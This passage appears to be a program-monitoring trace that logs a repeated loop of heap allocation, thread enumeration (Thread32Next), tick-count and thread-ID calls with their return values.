[0057.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.973] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.973] GetTickCount () returned 0x11db346 [0057.973] GetCurrentThreadId () returned 0x9e0 [0057.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.973] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.974] GetTickCount () returned 0x11db346 [0057.974] GetCurrentThreadId () returned 0x9e0 [0057.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.974] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.975] GetTickCount () returned 0x11db346 [0057.975] GetCurrentThreadId () returned 0x9e0 [0057.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.975] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.975] GetTickCount () returned 0x11db346 [0057.975] GetCurrentThreadId () returned 0x9e0 [0057.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.975] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.976] GetTickCount () returned 0x11db355 [0057.976] GetCurrentThreadId () returned 0x9e0 [0057.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.976] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.977] GetTickCount () returned 0x11db355 [0057.977] GetCurrentThreadId () returned 0x9e0 [0057.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.977] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.977] GetTickCount () returned 0x11db355 [0057.977] GetCurrentThreadId () returned 0x9e0 [0057.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.977] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.978] GetTickCount () returned 0x11db355 [0057.978] GetCurrentThreadId () returned 0x9e0 [0057.978] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.978] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.978] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.979] GetTickCount () returned 0x11db355 [0057.979] GetCurrentThreadId () returned 0x9e0 [0057.979] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.979] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.979] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.979] GetTickCount () returned 0x11db355 [0057.979] GetCurrentThreadId () returned 0x9e0 [0057.979] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.980] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.980] GetTickCount () returned 0x11db355 [0057.980] GetCurrentThreadId () returned 0x9e0 [0057.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.980] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.981] GetTickCount () returned 0x11db355 [0057.981] GetCurrentThreadId () returned 0x9e0 [0057.981] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.981] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.981] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.981] GetTickCount () returned 0x11db355 [0057.982] GetCurrentThreadId () returned 0x9e0 [0057.982] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.982] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.982] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.982] GetTickCount () returned 0x11db355 [0057.982] GetCurrentThreadId () returned 0x9e0 [0057.982] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.982] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.982] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.983] GetTickCount () returned 0x11db355 [0057.983] GetCurrentThreadId () returned 0x9e0 [0057.983] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.983] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.983] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.984] GetTickCount () returned 0x11db355 [0057.984] GetCurrentThreadId () returned 0x9e0 [0057.984] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.984] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.984] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.984] GetTickCount () returned 0x11db355 [0057.984] GetCurrentThreadId () returned 0x9e0 [0057.984] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.985] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.985] GetTickCount () returned 0x11db355 [0057.985] GetCurrentThreadId () returned 0x9e0 [0057.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.985] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.986] GetTickCount () returned 0x11db355 [0057.986] GetCurrentThreadId () returned 0x9e0 [0057.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.986] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.986] GetTickCount () returned 0x11db355 [0057.987] GetCurrentThreadId () returned 0x9e0 [0057.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.987] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.987] GetTickCount () returned 0x11db355 [0057.987] GetCurrentThreadId () returned 0x9e0 [0057.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.987] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.988] GetTickCount () returned 0x11db355 [0057.988] GetCurrentThreadId () returned 0x9e0 [0057.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.988] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.989] GetTickCount () returned 0x11db355 [0057.989] GetCurrentThreadId () returned 0x9e0 [0057.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.989] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.989] GetTickCount () returned 0x11db355 [0057.989] GetCurrentThreadId () returned 0x9e0 [0057.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.989] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.990] GetTickCount () returned 0x11db355 [0057.990] GetCurrentThreadId () returned 0x9e0 [0057.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.990] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.991] GetTickCount () returned 0x11db355 [0057.991] GetCurrentThreadId () returned 0x9e0 [0057.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.991] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.991] GetTickCount () returned 0x11db365 [0057.991] GetCurrentThreadId () returned 0x9e0 [0057.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.992] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.992] GetTickCount () returned 0x11db365 [0057.992] GetCurrentThreadId () returned 0x9e0 [0057.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.992] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.993] GetTickCount () returned 0x11db365 [0057.993] GetCurrentThreadId () returned 0x9e0 [0057.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.993] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.993] GetTickCount () returned 0x11db365 [0057.993] GetCurrentThreadId () returned 0x9e0 [0057.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.994] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.994] GetTickCount () returned 0x11db365 [0057.994] GetCurrentThreadId () returned 0x9e0 [0057.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.994] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.995] GetTickCount () returned 0x11db365 [0057.995] GetCurrentThreadId () returned 0x9e0 [0057.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.995] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.995] GetTickCount () returned 0x11db365 [0057.996] GetCurrentThreadId () returned 0x9e0 [0057.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.996] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.996] GetTickCount () returned 0x11db365 [0057.996] GetCurrentThreadId () returned 0x9e0 [0057.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.996] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.997] GetTickCount () returned 0x11db365 [0057.997] GetCurrentThreadId () returned 0x9e0 [0057.997] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.997] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.997] GetTickCount () returned 0x11db365 [0057.998] GetCurrentThreadId () returned 0x9e0 [0057.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.998] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.998] GetTickCount () returned 0x11db365 [0057.998] GetCurrentThreadId () returned 0x9e0 [0057.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.998] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.999] GetTickCount () returned 0x11db365 [0057.999] GetCurrentThreadId () returned 0x9e0 [0057.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.999] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.999] GetTickCount () returned 0x11db365 [0057.999] GetCurrentThreadId () returned 0x9e0 [0057.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.000] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.000] GetTickCount () returned 0x11db365 [0058.000] GetCurrentThreadId () returned 0x9e0 [0058.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.000] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.001] GetTickCount () returned 0x11db365 [0058.001] GetCurrentThreadId () returned 0x9e0 [0058.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.001] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.001] GetTickCount () returned 0x11db365 [0058.001] GetCurrentThreadId () returned 0x9e0 [0058.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.001] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.002] GetTickCount () returned 0x11db365 [0058.002] GetCurrentThreadId () returned 0x9e0 [0058.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.002] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.003] GetTickCount () returned 0x11db365 [0058.003] GetCurrentThreadId () returned 0x9e0 [0058.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.003] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.003] GetTickCount () returned 0x11db365 [0058.003] GetCurrentThreadId () returned 0x9e0 [0058.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.003] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.004] GetTickCount () returned 0x11db365 [0058.004] GetCurrentThreadId () returned 0x9e0 [0058.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.004] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.004] GetTickCount () returned 0x11db365 [0058.004] GetCurrentThreadId () returned 0x9e0 [0058.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.005] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.005] GetTickCount () returned 0x11db365 [0058.005] GetCurrentThreadId () returned 0x9e0 [0058.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.005] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.006] GetTickCount () returned 0x11db365 [0058.006] GetCurrentThreadId () returned 0x9e0 [0058.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.006] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.006] GetTickCount () returned 0x11db365 [0058.006] GetCurrentThreadId () returned 0x9e0 [0058.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.006] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.007] GetTickCount () returned 0x11db375 [0058.007] GetCurrentThreadId () returned 0x9e0 [0058.007] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.007] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.008] GetTickCount () returned 0x11db375 [0058.008] GetCurrentThreadId () returned 0x9e0 [0058.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.008] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.008] GetTickCount () returned 0x11db375 [0058.008] GetCurrentThreadId () returned 0x9e0 [0058.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.008] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.009] GetTickCount () returned 0x11db375 [0058.009] GetCurrentThreadId () returned 0x9e0 [0058.009] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.009] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.009] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.010] GetTickCount () returned 0x11db375 [0058.010] GetCurrentThreadId () returned 0x9e0 [0058.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.010] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.010] GetTickCount () returned 0x11db375 [0058.010] GetCurrentThreadId () returned 0x9e0 [0058.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.010] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.011] GetTickCount () returned 0x11db375 [0058.011] GetCurrentThreadId () returned 0x9e0 [0058.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.011] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.011] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.012] GetTickCount () returned 0x11db375 [0058.012] GetCurrentThreadId () returned 0x9e0 [0058.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.012] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.012] GetTickCount () returned 0x11db375 [0058.012] GetCurrentThreadId () returned 0x9e0 [0058.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.012] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.013] GetTickCount () returned 0x11db375 [0058.013] GetCurrentThreadId () returned 0x9e0 [0058.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.013] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.014] GetTickCount () returned 0x11db375 [0058.014] GetCurrentThreadId () returned 0x9e0 [0058.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.014] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.014] GetTickCount () returned 0x11db375 [0058.014] GetCurrentThreadId () returned 0x9e0 [0058.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.014] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.015] GetTickCount () returned 0x11db375 [0058.015] GetCurrentThreadId () returned 0x9e0 [0058.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.015] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.016] GetTickCount () returned 0x11db375 [0058.016] GetCurrentThreadId () returned 0x9e0 [0058.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.016] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.016] GetTickCount () returned 0x11db375 [0058.016] GetCurrentThreadId () returned 0x9e0 [0058.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.016] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.017] GetTickCount () returned 0x11db375 [0058.017] GetCurrentThreadId () returned 0x9e0 [0058.017] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.017] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.017] GetTickCount () returned 0x11db375 [0058.017] GetCurrentThreadId () returned 0x9e0 [0058.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.018] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.018] GetTickCount () returned 0x11db375 [0058.018] GetCurrentThreadId () returned 0x9e0 [0058.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.018] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.019] GetTickCount () returned 0x11db375 [0058.019] GetCurrentThreadId () returned 0x9e0 [0058.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.019] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.019] GetTickCount () returned 0x11db375 [0058.019] GetCurrentThreadId () returned 0x9e0 [0058.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.019] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.020] GetTickCount () returned 0x11db375 [0058.020] GetCurrentThreadId () returned 0x9e0 [0058.020] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.020] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.020] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.021] GetTickCount () returned 0x11db375 [0058.021] GetCurrentThreadId () returned 0x9e0 [0058.021] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.021] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 